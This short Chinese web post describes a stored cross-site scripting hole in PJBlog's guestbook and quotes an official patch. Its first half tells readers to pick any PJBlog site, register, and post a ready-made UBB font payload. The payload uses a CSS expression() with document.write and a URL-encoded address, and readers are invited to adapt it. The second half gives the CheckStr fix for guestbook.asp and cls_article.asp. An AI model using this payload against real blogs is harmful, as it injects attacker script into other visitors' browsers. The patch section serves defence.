随便找个PJBLOG然后注册个用户..
登陆后进入留言本
输入留言记得在保密的地方那个框框要勾上..
留言代码可以是这样:
[font=expression(container.document.write(unescape('%68%74%74%70%3A%2F%2F%77%77%77%2E%77%69%6E%73%68%65%6C%6C%2E%63%6E')))]badwolf当然大家自由发挥还是更好..
官方论坛提供的暂时修正方法:
如果不用屏蔽关键字的办法。则使用下面的办法修补漏洞
打开guestbook.asp搜索
<%=UBBCode(HtmlEncode(GuestDB("book_Content")),0,GBSet.getKeyValue("ubbCode"),GBSet.getKeyValue("ImgCode"),GBSet.getKeyValue("autoURL"),1)%>改为:<%=CheckStr(UBBCode(HtmlEncode(GuestDB("book_Content")),0,GBSet.getKeyValue("ubbCode"),GBSet.getKeyValue("ImgCode"),GBSet.getKeyValue("autoURL"),1))%>
打开cls_article.asp搜索
<%=UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount))%>改为:<%=CheckStr(UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount)))%>
Tags:pjblog,最新,跨站,代码,安全,网络
|
当前位置:
